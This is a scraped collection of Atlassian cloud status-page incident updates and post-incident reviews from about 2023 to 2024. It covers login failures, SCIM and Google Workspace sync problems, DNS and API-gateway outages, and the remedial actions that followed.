We continue to work on resolving the issue with licensing subscription/resubscription that is impacting some Atlassian Access Cloud customers. We have identified the root cause and applied the fix for some affected customers. Expect recovery shortly.
We are investigating an issue with licensing subscription activation and reactivation that is impacting some Atlassian Access Cloud customers. We will provide more details within the next hour.
Report: "Issues in new product activations, user management and user imports"
Last updateBetween 09:00 UTC to 18:00 UTC, we experienced an issue for user management and user imports for Confluence, Jira, Jira Service Management, and Jira Work Management, and Jira Product Discovery. The issue has been resolved and the service is operating normally.
We are seeing some reoccurrence of the issue and have taken some mitigation actions. We are closely monitoring the issue while those actions take effect.
We have identified the root cause of the product actions and user management issues. The problem was now mitigated. We are now monitoring closely.
We are investigating an issue with our servers that is impacting some of our customers ability to perform: > New product activations; > User import; > User management. We will provide more details within the next hour.
We are investigating an issue with our servers that is impacting some of our customers ability to perform: > New product activations; > User import; > User management. We will provide more details within the next hour.
Report: "Intermittent errors during login for some customers"
Last updateBetween 07:31 UTC to 12:32 UTC, we experienced errors during login for Atlassian Support, Confluence, Jira Work Management, Jira Service Management, Jira Software, Opsgenie, Trello, Atlassian Bitbucket, Atlassian Access, Jira Product Discovery, Compass, and Atlassian Analytics. The issue has been resolved and the service is operating normally.
We have identified the root cause of the errors during login and have mitigated the problem. We are now monitoring closely.
We are investigating reports of errors during login that is impacting some Atlassian Support, Confluence, Jira Work Management, Jira Service Management, Jira Software, Opsgenie, Trello, Atlassian Bitbucket, Atlassian Access, Jira Product Discovery, Compass, and Atlassian Analytics. We have identified the root cause and expect recovery shortly.
We are investigating reports of errors during login for some customers that is impacting some Atlassian Support, Confluence, Jira Work Management, Jira Service Management, Jira Software, Opsgenie, Trello, Atlassian Bitbucket, Atlassian Access, Jira Product Discovery, and Atlassian Analytics Cloud customers. We will provide more details within the next hour.
We are investigating reports of errors during login for some customers that is impacting some Atlassian Support, Confluence, Jira Work Management, Jira Service Management, Jira Software, Opsgenie, Trello, Atlassian Bitbucket, Atlassian Access, Jira Product Discovery, and Atlassian Analytics Cloud customers. We will provide more details within the next hour.
We are investigating reports of errors during login for some customers that is impacting some Confluence, Jira Work Management, Jira Service Management, Jira Software, Opsgenie, Trello, Atlassian Bitbucket, Atlassian Access, Jira Product Discovery, and Atlassian Analytics Cloud customers. We will provide more details within the next hour.
We are investigating reports of intermittent errors during login for some customers using Confluence, Jira Work Management, Jira Service Management, Jira Software, Trello, Atlassian Bitbucket, Atlassian Access, and Jira Product Discovery Cloud customers. We will provide more details once we identify the root cause.
Report: "Performance issues and outages with Cloud products"
Last update### **SUMMARY** We understand the importance of providing reliable and consistent service to our valued customers. On July 6, 2023, from 03:52 to 15:11 UTC, we experienced an issue with an upgraded version of a third-party tool that functions as our internal artifact management system. Despite our monitoring system identifying the incident within two minutes, this issue led to the degradation of the scaling capabilities of our internal hosting platform, resulting in service degradation or outages for customers of Atlassian cloud. In response to this situation, we are taking immediate measures to enhance the stability of our system and prevent similar issues from re-occurring. ### **IMPACT** This incident affected multiple regions and products due to the diminished scaling capabilities of our internal hosting platform. In most products and offerings, customers faced reduced functionality, slower response times, and limited access to specific features. ### **ROOT CAUSE** The root cause of the incident was the introduction of new functionality in a third-party tool that functions as our internal artifact management system. It led to an unexpected increase in the load on the primary database of the artifact system. Upon identifying and localizing the problem, we promptly adjusted the system configuration to regain stability. ### **REMEDIAL ACTIONS PLAN & NEXT STEPS** Over the next months, we will enact a temporary freeze on non-critical upgrades of the artifact management system, and we will focus our efforts on three high-priority initiatives: 1. **Enhancing system scaling:** We prioritized work ensuring that downtime in a critical infrastructure component does not affect the scaling of other components. We expect to complete this initiative within the next two months. 2. **Reducing interdependencies:** We are working to mitigate the risk of potential cascading failures by ensuring that significant system components are able to operate independently in the case of issues. Initiatives 1 and 2 are already in progress but have been given priority to be completed as soon as possible. 3. **Strengthening testing procedures:** Alongside these initiatives, we are addressing the need for even more stringent testing procedures than we already have in place to prevent potential issues in future updates. We are committed to collaborating closely with our technology partners to ensure the most optimal experience for our customers. We apologize for any inconvenience caused by this incident and appreciate your understanding. Our team is dedicated to continually improving our systems and processes to provide you with the exceptional service you deserve. Thank you for your continued support and trust in us. Sincerely, Atlassian Customer Support
We experienced performance issues and outages for several Atlassian Cloud Products. The issue has been resolved and the service is operating normally.
We have identified the root cause of an issue with an internal infrastructure component that has been impacting multiple Cloud products, including Jira Software, Jira Service Management and Confluence, and customers. This issue had lead to a performance impact and, in some cases, outages. We have implemented a fix to resolve the issue and recovery is in progress.
We are investigating an issue with an internal infrastructure component that is impacting multiple Cloud products, including Jira Software, Bitbucket, Jira Service Management and Confluence, and customers. These issues include performance impact and, in some cases, outages. Users may experience slow loading and uploading of attachments, login issues or inability for new customers to sign up. We have identified the root cause and are actively working on the service recovery.
Report: "Sign-ups, Product Activation, and Billing not working"
Last updateWe mitigated the issue with Sign-ups, Product Activation, and Billing, and the systems are back to BAU, and all functionality is restored.
We have identified the root cause of the Sign-ups, Product Activation, and Billing not working and have mitigated the problem. We are now monitoring closely.
We are investigating an issue with Sign-ups, Product Activation, and Billing that is impacting all of our Cloud Customers. We will provide more details within the next hour.
Report: "Reports of Lost Permissions for Google-Synced Groups"
Last updateWe are no longer observing any internal logs with the issue for the past 2 hours. We don't have an official confirmation from Google, however based on our observations we are now considering this issue resolved.
We are still waiting for an ETA from Google to permanently resolve the issue. In the mean time we will be proactively disabling Google sync and restoring the missing permissions for synced groups for all affected sites.
We continue to work on resolving the loss of permissions for synced groups from Google Workspace. We have identified the root cause and expect recovery shortly.
We are investigating intermittent reports of synced groups for Google Workspace being removed and re-added without the proper permissions for their Cloud Products. We will provide more details once we identify the root cause.
Report: "Google Workspace integration causing group deletion from Atlassian"
Last updateGoogle pushed updates for their Admin API that should resolve the group provisioning scope bad state. Any paused sync can be resumed, to restore functionality.
We have identified the root cause of the group deletions and have mitigated the problem. We are now monitoring closely. If this believe the issue has not been resolved for you, please don't hesitate to get in touch with Atlassian Support at https://support.atlassian.com/contact/
We are still investigating the recurring issue where Google Workspace is intermittently deleting groups from Atlassian Sites. This incident impacts the permissions and access to products. Our team is actively engaged in determining the cause of these erroneous deletions by Google Workspace integration and is working on a solution to prevent any future occurrences. If this situation has affected you and you require a fix, please don't hesitate to get in touch with Atlassian Support at https://support.atlassian.com/contact/
We identified a reoccurrence with Google Workspace sporadically removing groups from instances. This affects permissions and access to product instances. Our team is working to restore Google's incorrectly deleted settings and prevent further occurrences. In case you are affected and need restoration, contact Atlassian Support.
Updating affected components
Confluence and Jira customers should no longer face any issues in accessing their Atlassian Sites. We are actively investigating the root cause of the problem to provide a permanent fix.
Update: highlighting affected components
We're addressing an issue causing sporadic removal of synced groups from Cloud sites in Google Workspace. This is affecting permissions and access to projects. Our team is working to restore settings and prevent further occurrences. This is a recurrence of the issue reported on August 10, 2023. Apologies for any inconvenience.
Report: "Atlassian services unable to scale"
Last updateWe have resolved a case of degraded performance for Confluence, Jira Work Management, Jira Service Management, Jira Software, Atlassian Bitbucket, Atlassian Access, Jira Align, Jira Product Discovery, Atlas, and Compass Cloud customers. We will provide more details within the next hour.
Report: "SP Entity URL and SP ACS URL not visible on the SAML SSO setup workflow"
Last updateThis incident has been resolved. Service provider entity URL and the Service provider assertion consumer service URL are displayed correctly now.
A fix has been implemented and we are monitoring the results.
We have identified an issue where the Service provider entity URL and the Service provider assertion consumer service URL are not visible in the SAML SSO configuration wizard. We have identified the root cause and are now working to fix it.
Report: "Atlassian Account login issues"
Last update### **SUMMARY** On Sep 13, 2023, between 12:00 PM UTC and 03: 30 PM UTC, some Atlassian users were unable to sign in to their accounts and use multiple Atlassian cloud products. The event was triggered by a misconfiguration of rate limits in an internal service which caused a cascading failure in sign-in and signup-related APIs. The incident was quickly detected by multiple automated monitoring systems. The incident was mitigated on Sep 13, 2023, 03: 30 PM UTC by the rollback of a feature and additional scaling of services which put Atlassian systems into a known good state. The total time to resolution was about 3 hours & 30 minutes. ### **IMPACT** The overall impact was between Sep 13, 2023, 12:00 PM UTC and Sep 13, 2023, 03: 30 PM UTC on multiple products. The Incident caused intermittent service disruption across all regions. Some users were unable to sign in for sessions. Other scenarios that temporarily failed were new user signups, profile retrieval, and password reset. During the incident we had a peak of 90% requests failing across authentication, user profile retrieval, and password reset use cases. ### **ROOT CAUSE** The issue was caused due to a misconfiguration of a rate limit in an internal core service. As a result, some sign-in requests over the limit received HTTP 429 errors. However, retry behavior for requests caused a multiplication of load which led to higher service degradation. As many internal services depend on each other, the call graph complexity led to a longer time to detect the actual faulty service. ### **REMEDIAL ACTIONS PLAN & NEXT STEPS** We are continuously improving our system's resiliency. We are prioritizing the following improvement actions to avoid repeating this type of incident: * Audit and improve service rate limits and client retry and backoff behavior. * Improve scale and load test automation for complex service interactions. * Audit cross-service dependencies and minimize them where possible related to sign-in flows. Due to the unavailability of sign-in, some customers were unable to create support tickets. We are making additional process improvements to: * Enable our unauthenticated support contact form and notify users that it should be used when standard channels are not available. * Create status page notifications more quickly and ensure that for severe incidents, notifications to all subscribers are enabled. We apologize to users who were impacted during this incident; we are taking immediate steps to improve the platform’s reliability and availability. Thanks, Atlassian Customer Support
Between 12:45 UTC to 15:30 UTC, we experienced login and signup issues for Atlassian Accounts. The issue has been resolved and the service is operating normally. We will publish a post-incident review with the details of the incident and the actions we are taking to prevent similar problem in the future.
We are no longer seeing occurrences of the Atlassian Accounts login errors, all clients should be able to successfully login now. We will continue to monitor.
We can see a reduction in the Atlassian Accounts login issues after the mitigation actions were taken. We are still monitoring closely and will continue to provide updates.
We have identified the root cause of the Atlassian Accounts login issues impacting Cloud Customers and have mitigated the problem. We are now monitoring this closely.
We are investigating an issue with Atlassian Accounts login that is impacting some Cloud customers. We will provide more details within the next hour.
Report: "Degraded performance in Cloud"
Last updateThe issues with Access have been mitigated and the incident is being marked resolved for Access.
An outage with a cloud provider is impacting multiple Atlassian Cloud products including Access, Confluence, Trello, and Jira Products. We will provide more details within the next hour.
Report: "Degraded performance in Cloud"
Last updateBetween 09/18 10:47 UTC to 09/19 04:15 UTC, we experienced degraded performance for some Confluence, Jira Work Management, Jira Service Management, Jira Software, Trello, Atlassian Access, and Jira Product Discovery customers. The issue has been resolved and the service is operating normally.
Services are confirmed to be stable. We are performing final validation checks before confirming the incident's resolution.
We have identified the root cause of the downgraded performance and have mitigated the problem. We are monitoring this closely.
We are investigating cases of degraded performance for some Atlassian Access Cloud customers. We will provide more details within the next hour.
Report: "Email domain unverified"
Last updateBetween 22:00 UTC 23rd October and 07:45 UTC 24th October, we experienced an issue with custom domain validation, this resulted in Atlassian Access notification emails for some customers to be sent from generic Atlassian email domains rather than the custom domain email address. The issue has been resolved and the service is operating normally.
We have identified the issue and a fix is currently being implemented. We expect this issue to be resolved shortly.
We identified that the mitigation method doesn't fix the issue in some affected Cloud instances. We are continuing with the investigation.
We have mitigated the problem. We are now monitoring this closely. Please contact us at https://support.atlassian.com/contact/ if you are still facing issues with email domain verification.
We continue to work on resolving the issue with domain verification. We have identified the root cause and expect recovery shortly.
The investigation is still ongoing. We are working on a mitigation.
We are continuing to investigate this issue. We are aware that this incident is impacting custom email configuration and some Jira notifications are being sent with the default email address instead of the configured custom email. We will provide more details in the next hour.
We are investigating an issue with emails that have been sent out to admins stating domain verification is failing. We will provide more details within the next hour.
Report: "Egress connectivity timing out"
Last updateThe systems are stable after the fix and monitoring for a specified duration
The issue was identified and a fix implemented. We are monitoring currently.
We are currently investigating an incident that result in outbound connections from Atlassian cloud in us-east-1 intermittently timing out. This affects Jira, Trello, Confluence, Ecosystem products. The features affected for these products are those that require opening a connection from Atlassian Cloud to public endpoints on the Internet
Including Atlassian Developer
We are currently investigating an incident that result in connection time outs on service egress proxy. This affects Jira, JSM, Confluence, BitBucket, Trello, Ecosystem products. The features affected for these products are those that require a connection to service egress.
Report: "Delayed SCIM provisioning syncs of users and groups from Identity Providers"
Last updateWe experienced degraded SCIM provisioning from external Identity Providers for Confluence, Jira Work Management, Jira Service Management, Jira Software, and Atlassian Access. The issue has been resolved and the service is operating normally.
A fix for the bottleneck identified in the Group synchronization process for SCIM Provisioning has been made. We are seeing processing start to return to normal levels and will be monitoring over the next few hours. The team is all hands on deck to keep improving the situation.
The bottleneck in the Group synchronization process for SCIM Provisioning has seen considerable improvement due to recent changes, but it is still under work. The team is all hands on deck to keep improving the situation.
The bottleneck in the Group synchronization process for SCIM Provisioning is still under work. The team is all hands on deck to improve the situation.
The bottleneck in the Group synchronization process for SCIM Provisioning is still under work. We are closely monitoring the service.
We have identified a bottleneck in the Group synchronisation process for SCIM Provisioning. We have increased the resources allocated to the process in order to mitigate the issue. We are now monitoring the service.
We are investigating cases of degraded performance when SCIM provisioning users/groups for Confluence, Jira Work Management, Jira Service Management, Jira Software, and Atlassian Access Cloud customers. We will provide more details shortly.
Report: "Service Disruptions Affecting Atlassian Products"
Last update### **Summary** On February 14, 2024, between 20:05 UTC and 23:03 UTC, Atlassian customers on the following cloud products encountered a service disruption: Access, Atlas, Atlassian Analytics, Bitbucket, Compass, Confluence, Ecosystem apps, Jira Service Management, Jira Software, Jira Work Management, Jira Product Discovery, Opsgenie, StatusPage, and Trello. As part of a security and compliance uplift, we had scheduled the deletion of unused and legacy domain names used for internal service-to-service connections. Active domain names were incorrectly deleted during this event. This impacted all cloud customers across all regions. The issue was identified and resolved through the rollback of the faulty deployment to restore the domain names and Atlassian systems to a stable state. The time to resolution was two hours and 58 minutes. ### **IMPACT** External customers started reporting issues with Atlassian cloud products at 20:52 UTC. The impact of the failed change led to performance degradation or in some cases, complete service disruption. Symptoms experienced by end-users were unsuccessful page loads and/or failed interactions with our cloud products. ### **ROOT CAUSE** As part of a security and compliance uplift, we had scheduled the deletion of unused and legacy domain names that were being used for internal service-to-service connections. Active domain names were incorrectly deleted during this operation. ### **REMEDIAL ACTIONS PLAN & NEXT STEPS** We know that outages impact your productivity. The detection was delayed because existing testing & monitoring focused on service health rather than the entire system’s availability. To prevent a recurrence of this type of incident, we are implementing the following improvement measures: * Canary checks to monitor the entire system availability. * Faster rollback procedures for this type of service impact. * Stricter change control procedures for infrastructure modifications. * Migration of all DNS records to centralised management and stricter access controls on modification to DNS records. We apologize to customers whose services were impacted during this incident; we are taking immediate steps to improve the platform’s performance and availability. Thanks, Atlassian Customer Support
We experienced increased errors on Confluence, Jira Work Management, Jira Service Management, Jira Software, Opsgenie, Trello, Atlassian Bitbucket, Atlassian Access, Jira Align, Jira Product Discovery, Atlas, Compass, and Atlassian Analytics. The issue has been resolved and the services are operating normally.
We have identified the root cause of the Service Disruptions affecting all Atlassian products and have mitigated the problem. We are now monitoring this closely.
We have identified the root cause of the increased errors and have mitigated the problem. We continue to work on resolving the issue and monitoring this closely.
We are investigating reports of intermittent errors for all Cloud Customers across all Atlassian products. We will provide more details once we identify the root cause.
Report: "Audit logs fetching was failing"
Last updateBetween 20:24 UTC to 20:55 UTC, we experienced outage in audit logs for Atlassian Access. The issue has been resolved and the service is operating normally.
Audit logs was down between 12:24pm to 12:55pm PST. There was no data loss. The issue is mitigated at this time, but we are monitoring the service.
Report: "Investigating new product purchasing"
Last updateBetween 28th Feb 2024 23:15 UTC to 29th Feb 2024 00:05 UTC, we experienced issue with new product purchasing for all products. All new sign up products have been successfully provision and confirmed issue has been resolved and the service is operating normally.
We are investigating an issue with new product purchasing that is impacting for all products. Customers adding new cloud products may have experienced a long waiting page or an error page after attempting to add a product. We have mitigated the root cause and are working to resolve impact for customers who attempted to add a product during the impact period. We will provide more details within the next hour.
Report: "Admin Portal Feature Access Issue"
Last updateBetween 6:30 AM UTC to 9:50 AM UTC, we experienced failures in accessing some features from the Admin Portal. The issue has been resolved and the service is operating normally.
We are investigating an issue causing failures in accessing some features from the Admin Portal, which is impacting some of our Cloud customers. We have identified the root cause and anticipate recovery shortly.
Report: "Delayed SCIM group sync"
Last updateThe issue was resolved. All the groups are sync and the system is healthy. The incident is closed.
We continue to work on resolving the delayed SCIM group sync from the provisioning directory to individual Cloud sites. We have mitigated the root cause and are seeing recovery of sync tasks.
We are investigating delayed SCIM group sync from the provisioning directory to individual Cloud sites.
Report: "Error responses across multiple Cloud products"
Last update### Summary On June 3rd, between 09:43pm and 10:58 pm UTC, Atlassian customers using multiple product\(s\) were unable to access their services. The event was triggered by a change to the infrastructure API Gateway, which is responsible for routing the traffic to the correct application backends. The incident was detected by the automated monitoring system within five minutes and mitigated by correcting a faulty release feature flag, which put Atlassian systems into a known good state. The first communications were published on the Statuspage at 11:11pm UTC. The total time to resolution was about 75 minutes. ### **IMPACT** The overall impact was between 09:43pm and 10:17pm UTC, with the system initially in a degraded state, followed by a total outage between 10:17pm and 10:58pm UTC. _The Incident caused service disruption to customers in all regions and affected the following products:_ * Jira Software * Jira Service Management * Jira Work Management * Jira Product Discovery * Jira Align * Confluence * Trello * Bitbucket * Opsgenie * Compass ### **ROOT CAUSE** A policy used in the infrastructure API gateway was being updated in production via a feature flag. The combination of an erroneous value entered in a feature flag, and a bug in the code resulted in the API Gateway not processing any traffic. This created a total outage, where all users started receiving 5XX errors for most Atlassian products. Once the problem was identified and the feature flag updated to the correct values, all services started seeing recovery immediately. ### **REMEDIAL ACTIONS PLAN & NEXT STEPS** We know that outages impact your productivity. While we have several testing and preventative processes in place, this specific issue wasn’t identified because the change did not go through our regular release process and instead was incorrectly applied through a feature flag. We are prioritizing the following improvement actions to avoid repeating this type of incident: * Prevent high-risk feature flags from being used in production * Improve the policy changes testing * Enforcing longer soak time for policy changes * Any feature flags should go through progressive rollouts to minimize broad impact * Review the infrastructure feature flags to ensure they all have appropriate defaults * Improve our processes and internal tooling to provide faster communications to our customers We apologize to customers whose services were affected by this incident and are taking immediate steps to address the above gaps. Thanks, Atlassian Customer Support
Between 22:18 UTC to 22:56 UTC, we experienced errors for multiple Cloud products. The issue has been resolved and the service is operating normally.
We are investigating an issue with error responses for some Cloud customers across multiple products. We have identified the root cause and expect recovery shortly.